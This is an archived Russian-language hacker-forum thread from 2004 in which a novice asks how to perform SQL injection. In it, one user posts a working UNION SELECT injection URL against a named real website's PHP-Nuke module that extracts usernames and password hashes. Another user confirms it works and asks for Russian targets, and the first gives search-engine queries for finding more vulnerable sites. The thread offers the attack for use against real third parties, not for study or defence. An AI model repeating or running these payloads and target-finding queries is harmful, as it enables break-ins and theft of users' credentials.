Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Как делать SQL injection.

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Как делать SQL injection.
Имя
Сообщение << Старые топики   Новые топики >>
Как делать SQL injection. - 2004-04-21 07:42:41   
zaza

Сообщений: 10
Оценки: 0
Присоединился: 2004-04-11 23:00:02
Скажите плиз как делать эти самые инъекции….

Вот например где это писать?
SELECT * FROM users WHERE login=''user'' OR 1=1–'' AND password=''31337''
Post #: 1
Как делать SQL injection. - 2004-04-21 11:18:33   
Pupkin-Zade

Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
В строке запроса, который передается по ссылке.
Post #: 2
Как делать SQL injection. - 2004-04-21 19:25:52   
zaza

Сообщений: 10
Оценки: 0
Присоединился: 2004-04-11 23:00:02
поподробнее плиз я тупой
Post #: 3
Как делать SQL injection. - 2004-04-24 14:42:25   
zaza

Сообщений: 10
Оценки: 0
Присоединился: 2004-04-11 23:00:02
че за строка запроса? объясни пожалуйста! а ведь еще есть такие многострочные хреньки
INSERT INTO (Samecity
SELECT *
FROM (salespeople A
WHERE city IN
(SELECT city
FROM customers B
WHERE B.snum = A.snum );
где это писать??
Приведи пример пожалуйста
Post #: 4
Как делать SQL injection. - 2004-04-24 17:29:46   
KyMup

Сообщений: 31
Оценки: 0
Присоединился: 2004-03-19 21:31:16
Твоя многострочная хренька легко привращается в строчную хреньку
Post #: 5
Как делать SQL injection. - 2004-04-24 17:40:30   
KyMup

Сообщений: 31
Оценки: 0
Присоединился: 2004-03-19 21:31:16
ладно, на тебе пример:

http://24x7.ee/modules.php?name=Downloads&d_op=viewdownload&cid=-1 UNION SELECT user_id, username, user_password FROM nuke_users/*


Post #: 6
Как делать SQL injection. - 2004-04-24 21:07:39   
zaza

Сообщений: 10
Оценки: 0
Присоединился: 2004-04-11 23:00:02
фенькс! но все равно я стоко всего пробовал и нихрена! как узнать название таблици в которой пароли хранятся на форуме Invision Power Board 1.3 ?
Post #: 7
Как делать SQL injection. - 2004-04-26 23:05:26   
ruby

Сообщений: 11
Оценки: 0
Присоединился: 2004-03-19 17:28:42
To KuMir:
За http://24x7.ee - биг сенкс! Все отлично работает. А на *.ru-сайтах такие мазы бывают? А то запарился эстонский учить…
Post #: 8
Как делать SQL injection. - 2004-04-27 19:07:39   
KyMup

Сообщений: 31
Оценки: 0
Присоединился: 2004-03-19 21:31:16
Блин, ruby, ты уже начинаешь парить…

Попробуй гугл.
Запрос типа:

.com/index.php & nuke

или

.ru/index.php & nuke

Дерзай!
Post #: 9
Как делать SQL injection. - 2004-08-04 00:32:11   
pop_korn

Сообщений: 4
Оценки: 0
Присоединился: 2004-08-01 05:35:47
YOU ARE SLAPPED BY NUKECOPS BY USING 'UNION' INSIDE 'name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,%20username,%20user_password%20FROM%20nuke_users/*'. [sm=mad.gif][sm=mad.gif]
Post #: 10
Страниц:  [1]
Все форумы >> [В Сети] >> Как делать SQL injection.







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.